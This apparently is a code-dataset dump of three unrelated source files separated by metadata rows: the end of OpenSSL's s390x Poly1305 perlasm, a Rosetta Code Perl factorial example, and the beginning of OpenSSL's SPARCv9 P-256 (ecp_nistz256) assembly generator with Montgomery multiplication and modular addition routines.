&{$z? \&slgr:\&slr} ($inp,$len);
LABEL (".Last");
vmlef ($ACC0,$I0,$R0);
vmlef ($ACC1,$I0,$R1);
vmlef ($ACC2,$I0,$R2);
vmlef ($ACC3,$I0,$R3);
vmlef ($ACC4,$I0,$R4);
vmalef ($ACC0,$I1,$S4,$ACC0);
vmalef ($ACC1,$I1,$R0,$ACC1);
vmalef ($ACC2,$I1,$R1,$ACC2);
vmalef ($ACC3,$I1,$R2,$ACC3);
vmalef ($ACC4,$I1,$R3,$ACC4);
vaf ($H0,$H0,$I0);
vaf ($H1,$H1,$I1);
vaf ($H2,$H2,$I2);
vaf ($H3,$H3,$I3);
vaf ($H4,$H4,$I4);
vmalef ($ACC0,$I2,$S3,$ACC0);
vmalef ($ACC1,$I2,$S4,$ACC1);
vmalef ($ACC2,$I2,$R0,$ACC2);
vmalef ($ACC3,$I2,$R1,$ACC3);
vmalef ($ACC4,$I2,$R2,$ACC4);
vmalef ($ACC0,$I3,$S2,$ACC0);
vmalef ($ACC1,$I3,$S3,$ACC1);
vmalef ($ACC2,$I3,$S4,$ACC2);
vmalef ($ACC3,$I3,$R0,$ACC3);
vmalef ($ACC4,$I3,$R1,$ACC4);
vmalef ($ACC0,$I4,$S1,$ACC0);
vmalef ($ACC1,$I4,$S2,$ACC1);
vmalef ($ACC2,$I4,$S3,$ACC2);
vmalef ($ACC3,$I4,$S4,$ACC3);
vmalef ($ACC4,$I4,$R0,$ACC4);
vmalof ($ACC0,$H0,$R0,$ACC0);
vmalof ($ACC1,$H0,$R1,$ACC1);
vmalof ($ACC2,$H0,$R2,$ACC2);
vmalof ($ACC3,$H0,$R3,$ACC3);
vmalof ($ACC4,$H0,$R4,$ACC4);
vmalof ($ACC0,$H1,$S4,$ACC0);
vmalof ($ACC1,$H1,$R0,$ACC1);
vmalof ($ACC2,$H1,$R1,$ACC2);
vmalof ($ACC3,$H1,$R2,$ACC3);
vmalof ($ACC4,$H1,$R3,$ACC4);
vmalof ($ACC0,$H2,$S3,$ACC0);
vmalof ($ACC1,$H2,$S4,$ACC1);
vmalof ($ACC2,$H2,$R0,$ACC2);
vmalof ($ACC3,$H2,$R1,$ACC3);
vmalof ($ACC4,$H2,$R2,$ACC4);
vmalof ($ACC0,$H3,$S2,$ACC0);
vmalof ($ACC1,$H3,$S3,$ACC1);
vmalof ($ACC2,$H3,$S4,$ACC2);
vmalof ($ACC3,$H3,$R0,$ACC3);
vmalof ($ACC4,$H3,$R1,$ACC4);
vmalof ($ACC0,$H4,$S1,$ACC0);
vmalof ($ACC1,$H4,$S2,$ACC1);
vmalof ($ACC2,$H4,$S3,$ACC2);
vmalof ($ACC3,$H4,$S4,$ACC3);
vmalof ($ACC4,$H4,$R0,$ACC4);
################################################################
# horizontal addition
vzero ($H0);
vsumqg ($ACC0,$ACC0,$H0);
vsumqg ($ACC1,$ACC1,$H0);
vsumqg ($ACC2,$ACC2,$H0);
vsumqg ($ACC3,$ACC3,$H0);
vsumqg ($ACC4,$ACC4,$H0);
################################################################
# lazy reduction
vesrlg ($H4,$ACC3,26);
vesrlg ($H1,$ACC0,26);
vn ($H3,$ACC3,$mask26);
vn ($H0,$ACC0,$mask26);
vag ($H4,$H4,$ACC4); # h3 -> h4
vag ($H1,$H1,$ACC1); # h0 -> h1
vesrlg ($ACC4,$H4,26);
vesrlg ($ACC1,$H1,26);
vn ($H4,$H4,$mask26);
vn ($H1,$H1,$mask26);
vag ($H0,$H0,$ACC4);
vag ($H2,$ACC2,$ACC1); # h1 -> h2
veslg ($ACC4,$ACC4,2); # <<2
vesrlg ($ACC2,$H2,26);
vn ($H2,$H2,$mask26);
vag ($H0,$H0,$ACC4); # h4 -> h0
vag ($H3,$H3,$ACC2); # h2 -> h3
vesrlg ($ACC0,$H0,26);
vesrlg ($ACC3,$H3,26);
vn ($H0,$H0,$mask26);
vn ($H3,$H3,$mask26);
vag ($H1,$H1,$ACC0); # h0 -> h1
vag ($H4,$H4,$ACC3); # h3 -> h4
&{$z? \&clgfi:\&clfi} ($len,0);
je (".Ldone");
vlm ($T1,$T4,"0x00($inp)"); # load last partial block
vgmg ($mask26,6,31);
vgmf ($I4,5,5); # padbit<<2
vperm ($I0,$T3,$T4,$bswaplo);
vperm ($I2,$T3,$T4,$bswapmi);
vperm ($T3,$T3,$T4,$bswaphi);
vl ($ACC0,"0x30($len,%r1)"); # borrow $ACC0,1
vl ($ACC1,"0x60($len,%r1)");
verimg ($I1,$I0,$mask26,6); # >>26
veslg ($I0,$I0,32);
veslg ($I2,$I2,28); # >>4
verimg ($I3,$T3,$mask26,18); # >>14
verimg ($I4,$T3,$mask26,58); # >>38
vn ($I0,$I0,$mask26);
vn ($I2,$I2,$mask26);
vesrlf ($I4,$I4,2); # >>2
vgmg ($mask26,38,63);
vperm ($T3,$T1,$T2,$bswaplo);
vperm ($T4,$T1,$T2,$bswaphi);
vperm ($T2,$T1,$T2,$bswapmi);
verimg ($I0,$T3,$mask26,0);
verimg ($I1,$T3,$mask26,38); # >>26
verimg ($I2,$T2,$mask26,60); # >>4
verimg ($I3,$T4,$mask26,50); # >>14
vesrlg ($T4,$T4,40);
vo ($I4,$I4,$T4);
vperm ($H0,$H0,$H0,$ACC0); # move hash to right lane
vn ($I0,$I0,$ACC1); # mask redundant lane[s]
vperm ($H1,$H1,$H1,$ACC0);
vn ($I1,$I1,$ACC1);
vperm ($H2,$H2,$H2,$ACC0);
vn ($I2,$I2,$ACC1);
vperm ($H3,$H3,$H3,$ACC0);
vn ($I3,$I3,$ACC1);
vperm ($H4,$H4,$H4,$ACC0);
vn ($I4,$I4,$ACC1);
vaf ($I0,$I0,$H0); # accumulate hash
vzero ($H0); # wipe hash value
vaf ($I1,$I1,$H1);
vzero ($H1);
vaf ($I2,$I2,$H2);
vzero ($H2);
vaf ($I3,$I3,$H3);
vzero ($H3);
vaf ($I4,$I4,$H4);
vzero ($H4);
&{$z? \&lghi:\&lhi} ($len,0);
j (".Last");
# I don't bother to tell apart cases when only one multiplication
# pass is sufficient, because I argue that mispredicted branch
# penalties are comparable to overhead of sometimes redundant
# multiplication pass...
LABEL (".Ldone");
vstef ($H0,"0($ctx)",3); # store hash base 2^26
vstef ($H1,"4($ctx)",3);
vstef ($H2,"8($ctx)",3);
vstef ($H3,"12($ctx)",3);
vstef ($H4,"16($ctx)",3);
if ($z) {
ld ("%f8","$stdframe+0*8($sp)");
ld ("%f9","$stdframe+1*8($sp)");
ld ("%f10","$stdframe+2*8($sp)");
ld ("%f11","$stdframe+3*8($sp)");
ld ("%f12","$stdframe+4*8($sp)");
ld ("%f13","$stdframe+5*8($sp)");
ld ("%f14","$stdframe+6*8($sp)");
ld ("%f15","$stdframe+7*8($sp)");
&{$z? \&lmg:\&lm} ("%r10","%r15","$stdframe+8*8+10*$SIZE_T($sp)");
} else {
ld ("%f4","$stdframe+16*$SIZE_T+2*8($sp)");
ld ("%f6","$stdframe+16*$SIZE_T+3*8($sp)");
&{$z? \&lmg:\&lm} ("%r10","%r15","$stdframe+10*$SIZE_T($sp)");
}
br ("%r14");
SIZE ("__poly1305_blocks_vx",".-__poly1305_blocks_vx");
}
################
# static void poly1305_emit(void *ctx, unsigned char mac[16],
# const u32 nonce[4])
{
my ($mac,$nonce)=($inp,$len);
my ($h0,$h1,$h2,$d0,$d1,$d2)=map("%r$_",(5..10));
GLOBL ("poly1305_emit");
TYPE ("poly1305_emit","\@function");
ALIGN (16);
LABEL ("poly1305_emit");
LABEL (".Lpoly1305_emit");
&{$z? \&stmg:\&stm} ("%r6","%r10","6*$SIZE_T($sp)");
lg ($d0,"0($ctx)");
lg ($d1,"8($ctx)");
lg ($d2,"16($ctx)");
llgfr ("%r0",$d0); # base 2^26 -> base 2^64
srlg ($h0,$d0,32);
llgfr ("%r1",$d1);
srlg ($h1,$d1,32);
srlg ($h2,$d2,32);
sllg ("%r0","%r0",26);
algr ($h0,"%r0");
sllg ("%r0",$h1,52);
srlg ($h1,$h1,12);
sllg ("%r1","%r1",14);
algr ($h0,"%r0");
alcgr ($h1,"%r1");
sllg ("%r0",$h2,40);
srlg ($h2,$h2,24);
lghi ("%r1",0);
algr ($h1,"%r0");
alcgr ($h2,"%r1");
llgf ("%r0","24($ctx)"); # is_base2_26
lcgr ("%r0","%r0");
xgr ($h0,$d0); # choose between radixes
xgr ($h1,$d1);
xgr ($h2,$d2);
ngr ($h0,"%r0");
ngr ($h1,"%r0");
ngr ($h2,"%r0");
xgr ($h0,$d0);
xgr ($h1,$d1);
xgr ($h2,$d2);
lghi ("%r0",5);
lgr ($d0,$h0);
lgr ($d1,$h1);
algr ($h0,"%r0"); # compare to modulus
alcgr ($h1,"%r1");
alcgr ($h2,"%r1");
srlg ($h2,$h2,2); # did it borrow/carry?
slgr ("%r1",$h2); # 0-$h2>>2
lg ($d2,"0($nonce)"); # load nonce
lg ($ctx,"8($nonce)");
xgr ($h0,$d0);
xgr ($h1,$d1);
ngr ($h0,"%r1");
ngr ($h1,"%r1");
xgr ($h0,$d0);
rllg ($d0,$d2,32); # flip nonce words
xgr ($h1,$d1);
rllg ($d1,$ctx,32);
algr ($h0,$d0); # accumulate nonce
alcgr ($h1,$d1);
strvg ($h0,"0($mac)"); # write little-endian result
strvg ($h1,"8($mac)");
&{$z? \&lmg:\&lm} ("%r6","%r10","6*$SIZE_T($sp)");
br ("%r14");
SIZE ("poly1305_emit",".-poly1305_emit");
}
################
ALIGN (16);
LABEL (".Lconst");
LONG (0x04050607,0x14151617,0x0c0d0e0f,0x1c1d1e1f); # merge odd
LONG (0x07060504,0x03020100,0x17161514,0x13121110); # byte swap masks
LONG (0x0f0e0d0c,0x0b0a0908,0x1f1e1d1c,0x1b1a1918);
LONG (0x00000000,0x09080706,0x00000000,0x19181716);
LONG (0x00000000,0x00000000,0x00000000,0x0c0d0e0f); # magic tail masks
LONG (0x0c0d0e0f,0x00000000,0x00000000,0x00000000);
LONG (0x00000000,0x00000000,0x0c0d0e0f,0x00000000);
LONG (0xffffffff,0x00000000,0xffffffff,0xffffffff);
LONG (0xffffffff,0x00000000,0xffffffff,0x00000000);
LONG (0x00000000,0x00000000,0xffffffff,0x00000000);
STRING ("\"Poly1305 for s390x, CRYPTOGAMS by <appro\@openssl.org>\"");
PERLASM_END();
| 24.825381 | 76 | 0.5338 |
ed8822323977c360695a2dc9a7601c992ce4d5f6 | 214 | pl | Perl | Task/Factorial/Perl/factorial-1.pl | mullikine/RosettaCodeData | 4f0027c6ce83daa36118ee8b67915a13cd23ab67 | [
"Info-ZIP"
] | 1 | 2018-11-09T22:08:38.000Z | 2018-11-09T22:08:38.000Z | Task/Factorial/Perl/factorial-1.pl | mullikine/RosettaCodeData | 4f0027c6ce83daa36118ee8b67915a13cd23ab67 | [
"Info-ZIP"
] | null | null | null | Task/Factorial/Perl/factorial-1.pl | mullikine/RosettaCodeData | 4f0027c6ce83daa36118ee8b67915a13cd23ab67 | [
"Info-ZIP"
] | 1 | 2018-11-09T22:08:40.000Z | 2018-11-09T22:08:40.000Z |
sub factorial
{
my $n = shift;
my $result = 1;
for (my $i = 1; $i <= $n; ++$i)
{
$result *= $i;
};
$result;
}
# using a .. range
sub factorial {
my $r = 1;
$r *= $_ for 1..shift;
$r;
}
| 11.888889 | 33 | 0.425234 |
ed95b200f3551e725b790fb61f6910589e6bfa1c | 77,864 | pl | Perl | crypto/ec/asm/ecp_nistz256-sparcv9.pl | BPLSNico/openssl | f8f686ec1cda6a077ec9d5c2ab540cf202059279 | [
"OpenSSL"
] | null | null | null | crypto/ec/asm/ecp_nistz256-sparcv9.pl | BPLSNico/openssl | f8f686ec1cda6a077ec9d5c2ab540cf202059279 | [
"OpenSSL"
] | null | null | null | crypto/ec/asm/ecp_nistz256-sparcv9.pl | BPLSNico/openssl | f8f686ec1cda6a077ec9d5c2ab540cf202059279 | [
"OpenSSL"
] | null | null | null |
#! /usr/bin/env perl
# Copyright 2015-2016 The OpenSSL Project Authors. All Rights Reserved.
#
# Licensed under the OpenSSL license (the "License"). You may not use
# this file except in compliance with the License. You can obtain a copy
# in the file LICENSE in the source distribution or at
# https://www.openssl.org/source/license.html
# ====================================================================
# Written by Andy Polyakov <appro@openssl.org> for the OpenSSL
# project. The module is, however, dual licensed under OpenSSL and
# CRYPTOGAMS licenses depending on where you obtain it. For further
# details see http://www.openssl.org/~appro/cryptogams/.
# ====================================================================
#
# ECP_NISTZ256 module for SPARCv9.
#
# February 2015.
#
# Original ECP_NISTZ256 submission targeting x86_64 is detailed in
# http://eprint.iacr.org/2013/816. In the process of adaptation
# original .c module was made 32-bit savvy in order to make this
# implementation possible.
#
# with/without -DECP_NISTZ256_ASM
# UltraSPARC III +12-18%
# SPARC T4 +99-550% (+66-150% on 32-bit Solaris)
#
# Ranges denote minimum and maximum improvement coefficients depending
# on benchmark. Lower coefficients are for ECDSA sign, server-side
# operation. Keep in mind that +200% means 3x improvement.
$output = pop;
open STDOUT,">$output";
$code.=<<___;
#include "sparc_arch.h"
#define LOCALS (STACK_BIAS+STACK_FRAME)
#ifdef __arch64__
.register %g2,#scratch
.register %g3,#scratch
# define STACK64_FRAME STACK_FRAME
# define LOCALS64 LOCALS
#else
# define STACK64_FRAME (2047+192)
# define LOCALS64 STACK64_FRAME
#endif
.section ".text",#alloc,#execinstr
___
########################################################################
# Convert ecp_nistz256_table.c to layout expected by ecp_nistz256_gather_w7
#
$0 =~ m/(.*[\/\\])[^\/\\]+$/; $dir=$1;
open TABLE,"<ecp_nistz256_table.c" or
open TABLE,"<${dir}../ecp_nistz256_table.c" or
die "failed to open ecp_nistz256_table.c:",$!;
use integer;
foreach(<TABLE>) {
s/TOBN\(\s*(0x[0-9a-f]+),\s*(0x[0-9a-f]+)\s*\)/push @arr,hex($2),hex($1)/geo;
}
close TABLE;
# See ecp_nistz256_table.c for explanation for why it's 64*16*37.
# 64*16*37-1 is because $#arr returns the last valid index of @arr, not
# the number of elements.
die "insane number of elements" if ($#arr != 64*16*37-1);
$code.=<<___;
.globl ecp_nistz256_precomputed
.align 4096
ecp_nistz256_precomputed:
___
########################################################################
# this conversion smashes P256_POINT_AFFINE by individual bytes with
# 64 byte interval, similar to
# 1111222233334444
# 1234123412341234
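# In other words byte k of entry j lands at offset k*64+j within each
# 64-entry block, so ecp_nistz256_gather_w7 below can reassemble one
# entry with ldub loads at a fixed 64-byte stride; presumably the
# point of this layout is that the bytes of every entry share the
# same set of cache lines.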
for(1..37) {
@tbl = splice(@arr,0,64*16);
for($i=0;$i<64;$i++) {
undef @line;
for($j=0;$j<64;$j++) {
push @line,(@tbl[$j*16+$i/4]>>(($i%4)*8))&0xff;
}
$code.=".byte\t";
$code.=join(',',map { sprintf "0x%02x",$_} @line);
$code.="\n";
}
}
{{{
my ($rp,$ap,$bp)=map("%i$_",(0..2));
my @acc=map("%l$_",(0..7));
my ($t0,$t1,$t2,$t3,$t4,$t5,$t6,$t7)=(map("%o$_",(0..5)),"%g4","%g5");
my ($bi,$a0,$mask,$carry)=(map("%i$_",(3..5)),"%g1");
my ($rp_real,$ap_real)=("%g2","%g3");
$code.=<<___;
.size ecp_nistz256_precomputed,.-ecp_nistz256_precomputed
.align 64
.LRR: ! 2^512 mod P precomputed for NIST P256 polynomial
.long 0x00000003, 0x00000000, 0xffffffff, 0xfffffffb
.long 0xfffffffe, 0xffffffff, 0xfffffffd, 0x00000004
.Lone:
.long 1,0,0,0,0,0,0,0
.asciz "ECP_NISTZ256 for SPARCv9, CRYPTOGAMS by <appro\@openssl.org>"
! void ecp_nistz256_to_mont(BN_ULONG %i0[8],const BN_ULONG %i1[8]);
.globl ecp_nistz256_to_mont
.align 64
ecp_nistz256_to_mont:
save %sp,-STACK_FRAME,%sp
nop
1: call .+8
add %o7,.LRR-1b,$bp
call __ecp_nistz256_mul_mont
nop
ret
restore
.size ecp_nistz256_to_mont,.-ecp_nistz256_to_mont
! void ecp_nistz256_from_mont(BN_ULONG %i0[8],const BN_ULONG %i1[8]);
.globl ecp_nistz256_from_mont
.align 32
ecp_nistz256_from_mont:
save %sp,-STACK_FRAME,%sp
nop
1: call .+8
add %o7,.Lone-1b,$bp
call __ecp_nistz256_mul_mont
nop
ret
restore
.size ecp_nistz256_from_mont,.-ecp_nistz256_from_mont
! void ecp_nistz256_mul_mont(BN_ULONG %i0[8],const BN_ULONG %i1[8],
! const BN_ULONG %i2[8]);
.globl ecp_nistz256_mul_mont
.align 32
ecp_nistz256_mul_mont:
save %sp,-STACK_FRAME,%sp
nop
call __ecp_nistz256_mul_mont
nop
ret
restore
.size ecp_nistz256_mul_mont,.-ecp_nistz256_mul_mont
! void ecp_nistz256_sqr_mont(BN_ULONG %i0[8],const BN_ULONG %i2[8]);
.globl ecp_nistz256_sqr_mont
.align 32
ecp_nistz256_sqr_mont:
save %sp,-STACK_FRAME,%sp
mov $ap,$bp
call __ecp_nistz256_mul_mont
nop
ret
restore
.size ecp_nistz256_sqr_mont,.-ecp_nistz256_sqr_mont
___
########################################################################
# Special thing to keep in mind is that $t0-$t7 hold 64-bit values,
# while all others are meant to keep 32. "Meant to" means that additions
# to @acc[0-7] do "contaminate" upper bits, but they are cleared before
# they can affect outcome (follow 'and' with $mask). Also keep in mind
# that addition with carry is addition with 32-bit carry, even though
# CPU is 64-bit. [Addition with 64-bit carry was introduced in T3, see
# below for VIS3 code paths.]
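# What follows is a word-by-word Montgomery multiplication: each of
# the eight b[i] words is multiplied into the accumulator and one
# reduction step (see the commentary inside the loop) is interleaved
# per word.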
$code.=<<___;
.align 32
__ecp_nistz256_mul_mont:
ld [$bp+0],$bi ! b[0]
mov -1,$mask
ld [$ap+0],$a0
srl $mask,0,$mask ! 0xffffffff
ld [$ap+4],$t1
ld [$ap+8],$t2
ld [$ap+12],$t3
ld [$ap+16],$t4
ld [$ap+20],$t5
ld [$ap+24],$t6
ld [$ap+28],$t7
mulx $a0,$bi,$t0 ! a[0-7]*b[0], 64-bit results
mulx $t1,$bi,$t1
mulx $t2,$bi,$t2
mulx $t3,$bi,$t3
mulx $t4,$bi,$t4
mulx $t5,$bi,$t5
mulx $t6,$bi,$t6
mulx $t7,$bi,$t7
srlx $t0,32,@acc[1] ! extract high parts
srlx $t1,32,@acc[2]
srlx $t2,32,@acc[3]
srlx $t3,32,@acc[4]
srlx $t4,32,@acc[5]
srlx $t5,32,@acc[6]
srlx $t6,32,@acc[7]
srlx $t7,32,@acc[0] ! "@acc[8]"
mov 0,$carry
___
for($i=1;$i<8;$i++) {
$code.=<<___;
addcc @acc[1],$t1,@acc[1] ! accumulate high parts
ld [$bp+4*$i],$bi ! b[$i]
ld [$ap+4],$t1 ! re-load a[1-7]
addccc @acc[2],$t2,@acc[2]
addccc @acc[3],$t3,@acc[3]
ld [$ap+8],$t2
ld [$ap+12],$t3
addccc @acc[4],$t4,@acc[4]
addccc @acc[5],$t5,@acc[5]
ld [$ap+16],$t4
ld [$ap+20],$t5
addccc @acc[6],$t6,@acc[6]
addccc @acc[7],$t7,@acc[7]
ld [$ap+24],$t6
ld [$ap+28],$t7
addccc @acc[0],$carry,@acc[0] ! "@acc[8]"
addc %g0,%g0,$carry
___
# Reduction iteration is normally performed by accumulating
# result of multiplication of modulus by "magic" digit [and
# omitting least significant word, which is guaranteed to
# be 0], but thanks to special form of modulus and "magic"
# digit being equal to least significant word, it can be
# performed with additions and subtractions alone. Indeed:
#
# ffff.0001.0000.0000.0000.ffff.ffff.ffff
# * abcd
# + xxxx.xxxx.xxxx.xxxx.xxxx.xxxx.xxxx.xxxx.abcd
#
# Now observing that ff..ff*x = (2^n-1)*x = 2^n*x-x, we
# rewrite above as:
#
# xxxx.xxxx.xxxx.xxxx.xxxx.xxxx.xxxx.xxxx.abcd
# + abcd.0000.abcd.0000.0000.abcd.0000.0000.0000
# - abcd.0000.0000.0000.0000.0000.0000.abcd
#
# or marking redundant operations:
#
# xxxx.xxxx.xxxx.xxxx.xxxx.xxxx.xxxx.xxxx.----
# + abcd.0000.abcd.0000.0000.abcd.----.----.----
# - abcd.----.----.----.----.----.----.----
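	# In other words adding acc[0]*modulus amounts to acc[3]+=acc[0],
	# acc[6]+=acc[0], acc[8]+=acc[0] and acc[7]-=acc[0], with the
	# implicit -acc[0] term clearing acc[0] itself, which is why the
	# least significant word can simply be dropped. A standalone
	# sanity check of the underlying arithmetic (illustrative only,
	# not used by this generator; assumes the core "bigint" pragma):
	#
	#   perl -Mbigint -e '$p = 2**256 - 2**224 + 2**192 + 2**96 - 1;
	#       $acc = 2**255 + 12345678987654321; $d = $acc % 2**32;
	#       print "low word cleared\n" if ($acc + $d*$p) % 2**32 == 0;
	#       print "value unchanged\n"  if ($acc + $d*$p) % $p == $acc % $p;'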
$code.=<<___;
! multiplication-less reduction
addcc @acc[3],$t0,@acc[3] ! r[3]+=r[0]
addccc @acc[4],%g0,@acc[4] ! r[4]+=0
and @acc[1],$mask,@acc[1]
and @acc[2],$mask,@acc[2]
addccc @acc[5],%g0,@acc[5] ! r[5]+=0
addccc @acc[6],$t0,@acc[6] ! r[6]+=r[0]
and @acc[3],$mask,@acc[3]
and @acc[4],$mask,@acc[4]
addccc @acc[7],%g0,@acc[7] ! r[7]+=0
addccc @acc[0],$t0,@acc[0] ! r[8]+=r[0] "@acc[8]"
and @acc[5],$mask,@acc[5]
and @acc[6],$mask,@acc[6]
addc $carry,%g0,$carry ! top-most carry
subcc @acc[7],$t0,@acc[7] ! r[7]-=r[0]
subccc @acc[0],%g0,@acc[0] ! r[8]-=0 "@acc[8]"
subc $carry,%g0,$carry ! top-most carry
and @acc[7],$mask,@acc[7]
and @acc[0],$mask,@acc[0] ! "@acc[8]"
___
push(@acc,shift(@acc)); # rotate registers to "omit" acc[0]
$code.=<<___;
mulx $a0,$bi,$t0 ! a[0-7]*b[$i], 64-bit results
mulx $t1,$bi,$t1
mulx $t2,$bi,$t2
mulx $t3,$bi,$t3
mulx $t4,$bi,$t4
mulx $t5,$bi,$t5
mulx $t6,$bi,$t6
mulx $t7,$bi,$t7
add @acc[0],$t0,$t0 ! accumulate low parts, can't overflow
add @acc[1],$t1,$t1
srlx $t0,32,@acc[1] ! extract high parts
add @acc[2],$t2,$t2
srlx $t1,32,@acc[2]
add @acc[3],$t3,$t3
srlx $t2,32,@acc[3]
add @acc[4],$t4,$t4
srlx $t3,32,@acc[4]
add @acc[5],$t5,$t5
srlx $t4,32,@acc[5]
add @acc[6],$t6,$t6
srlx $t5,32,@acc[6]
add @acc[7],$t7,$t7
srlx $t6,32,@acc[7]
srlx $t7,32,@acc[0] ! "@acc[8]"
___
}
$code.=<<___;
addcc @acc[1],$t1,@acc[1] ! accumulate high parts
addccc @acc[2],$t2,@acc[2]
addccc @acc[3],$t3,@acc[3]
addccc @acc[4],$t4,@acc[4]
addccc @acc[5],$t5,@acc[5]
addccc @acc[6],$t6,@acc[6]
addccc @acc[7],$t7,@acc[7]
addccc @acc[0],$carry,@acc[0] ! "@acc[8]"
addc %g0,%g0,$carry
addcc @acc[3],$t0,@acc[3] ! multiplication-less reduction
addccc @acc[4],%g0,@acc[4]
addccc @acc[5],%g0,@acc[5]
addccc @acc[6],$t0,@acc[6]
addccc @acc[7],%g0,@acc[7]
addccc @acc[0],$t0,@acc[0] ! "@acc[8]"
addc $carry,%g0,$carry
subcc @acc[7],$t0,@acc[7]
subccc @acc[0],%g0,@acc[0] ! "@acc[8]"
subc $carry,%g0,$carry ! top-most carry
___
push(@acc,shift(@acc)); # rotate registers to omit acc[0]
$code.=<<___;
! Final step is "if result > mod, subtract mod", but we do it
! "other way around", namely subtract modulus from result
! and if it borrowed, add modulus back.
subcc @acc[0],-1,@acc[0] ! subtract modulus
subccc @acc[1],-1,@acc[1]
subccc @acc[2],-1,@acc[2]
subccc @acc[3],0,@acc[3]
subccc @acc[4],0,@acc[4]
subccc @acc[5],0,@acc[5]
subccc @acc[6],1,@acc[6]
subccc @acc[7],-1,@acc[7]
subc $carry,0,$carry ! broadcast borrow bit
! Note that because mod has special form, i.e. consists of
! 0xffffffff, 1 and 0s, we can conditionally synthesize it by
! using value of broadcasted borrow and the borrow bit itself.
! To minimize dependency chain we first broadcast and then
! extract the bit by negating (follow $bi).
addcc @acc[0],$carry,@acc[0] ! add modulus or zero
addccc @acc[1],$carry,@acc[1]
neg $carry,$bi
st @acc[0],[$rp]
addccc @acc[2],$carry,@acc[2]
st @acc[1],[$rp+4]
addccc @acc[3],0,@acc[3]
st @acc[2],[$rp+8]
addccc @acc[4],0,@acc[4]
st @acc[3],[$rp+12]
addccc @acc[5],0,@acc[5]
st @acc[4],[$rp+16]
addccc @acc[6],$bi,@acc[6]
st @acc[5],[$rp+20]
addc @acc[7],$carry,@acc[7]
st @acc[6],[$rp+24]
retl
st @acc[7],[$rp+28]
.size __ecp_nistz256_mul_mont,.-__ecp_nistz256_mul_mont
! void ecp_nistz256_add(BN_ULONG %i0[8],const BN_ULONG %i1[8],
! const BN_ULONG %i2[8]);
.globl ecp_nistz256_add
.align 32
ecp_nistz256_add:
save %sp,-STACK_FRAME,%sp
ld [$ap],@acc[0]
ld [$ap+4],@acc[1]
ld [$ap+8],@acc[2]
ld [$ap+12],@acc[3]
ld [$ap+16],@acc[4]
ld [$ap+20],@acc[5]
ld [$ap+24],@acc[6]
call __ecp_nistz256_add
ld [$ap+28],@acc[7]
ret
restore
.size ecp_nistz256_add,.-ecp_nistz256_add
.align 32
__ecp_nistz256_add:
ld [$bp+0],$t0 ! b[0]
ld [$bp+4],$t1
ld [$bp+8],$t2
ld [$bp+12],$t3
addcc @acc[0],$t0,@acc[0]
ld [$bp+16],$t4
ld [$bp+20],$t5
addccc @acc[1],$t1,@acc[1]
ld [$bp+24],$t6
ld [$bp+28],$t7
addccc @acc[2],$t2,@acc[2]
addccc @acc[3],$t3,@acc[3]
addccc @acc[4],$t4,@acc[4]
addccc @acc[5],$t5,@acc[5]
addccc @acc[6],$t6,@acc[6]
addccc @acc[7],$t7,@acc[7]
subc %g0,%g0,$carry ! broadcast carry bit
.Lreduce_by_sub:
! if a+b carries, subtract modulus.
!
! Note that because mod has special form, i.e. consists of
! 0xffffffff, 1 and 0s, we can conditionally synthesize it by
! using value of broadcasted borrow and the borrow bit itself.
! To minimize dependency chain we first broadcast and then
! extract the bit by negating (follow $bi).
subcc @acc[0],$carry,@acc[0] ! subtract synthesized modulus
subccc @acc[1],$carry,@acc[1]
neg $carry,$bi
st @acc[0],[$rp]
subccc @acc[2],$carry,@acc[2]
st @acc[1],[$rp+4]
subccc @acc[3],0,@acc[3]
st @acc[2],[$rp+8]
subccc @acc[4],0,@acc[4]
st @acc[3],[$rp+12]
subccc @acc[5],0,@acc[5]
st @acc[4],[$rp+16]
subccc @acc[6],$bi,@acc[6]
st @acc[5],[$rp+20]
subc @acc[7],$carry,@acc[7]
st @acc[6],[$rp+24]
retl
st @acc[7],[$rp+28]
.size __ecp_nistz256_add,.-__ecp_nistz256_add
! void ecp_nistz256_mul_by_2(BN_ULONG %i0[8],const BN_ULONG %i1[8]);
.globl ecp_nistz256_mul_by_2
.align 32
ecp_nistz256_mul_by_2:
save %sp,-STACK_FRAME,%sp
ld [$ap],@acc[0]
ld [$ap+4],@acc[1]
ld [$ap+8],@acc[2]
ld [$ap+12],@acc[3]
ld [$ap+16],@acc[4]
ld [$ap+20],@acc[5]
ld [$ap+24],@acc[6]
call __ecp_nistz256_mul_by_2
ld [$ap+28],@acc[7]
ret
restore
.size ecp_nistz256_mul_by_2,.-ecp_nistz256_mul_by_2
.align 32
__ecp_nistz256_mul_by_2:
addcc @acc[0],@acc[0],@acc[0] ! a+a=2*a
addccc @acc[1],@acc[1],@acc[1]
addccc @acc[2],@acc[2],@acc[2]
addccc @acc[3],@acc[3],@acc[3]
addccc @acc[4],@acc[4],@acc[4]
addccc @acc[5],@acc[5],@acc[5]
addccc @acc[6],@acc[6],@acc[6]
addccc @acc[7],@acc[7],@acc[7]
b .Lreduce_by_sub
subc %g0,%g0,$carry ! broadcast carry bit
.size __ecp_nistz256_mul_by_2,.-__ecp_nistz256_mul_by_2
! void ecp_nistz256_mul_by_3(BN_ULONG %i0[8],const BN_ULONG %i1[8]);
.globl ecp_nistz256_mul_by_3
.align 32
ecp_nistz256_mul_by_3:
save %sp,-STACK_FRAME,%sp
ld [$ap],@acc[0]
ld [$ap+4],@acc[1]
ld [$ap+8],@acc[2]
ld [$ap+12],@acc[3]
ld [$ap+16],@acc[4]
ld [$ap+20],@acc[5]
ld [$ap+24],@acc[6]
call __ecp_nistz256_mul_by_3
ld [$ap+28],@acc[7]
ret
restore
.size ecp_nistz256_mul_by_3,.-ecp_nistz256_mul_by_3
.align 32
__ecp_nistz256_mul_by_3:
addcc @acc[0],@acc[0],$t0 ! a+a=2*a
addccc @acc[1],@acc[1],$t1
addccc @acc[2],@acc[2],$t2
addccc @acc[3],@acc[3],$t3
addccc @acc[4],@acc[4],$t4
addccc @acc[5],@acc[5],$t5
addccc @acc[6],@acc[6],$t6
addccc @acc[7],@acc[7],$t7
subc %g0,%g0,$carry ! broadcast carry bit
subcc $t0,$carry,$t0 ! .Lreduce_by_sub but without stores
neg $carry,$bi
subccc $t1,$carry,$t1
subccc $t2,$carry,$t2
subccc $t3,0,$t3
subccc $t4,0,$t4
subccc $t5,0,$t5
subccc $t6,$bi,$t6
subc $t7,$carry,$t7
addcc $t0,@acc[0],@acc[0] ! 2*a+a=3*a
addccc $t1,@acc[1],@acc[1]
addccc $t2,@acc[2],@acc[2]
addccc $t3,@acc[3],@acc[3]
addccc $t4,@acc[4],@acc[4]
addccc $t5,@acc[5],@acc[5]
addccc $t6,@acc[6],@acc[6]
addccc $t7,@acc[7],@acc[7]
b .Lreduce_by_sub
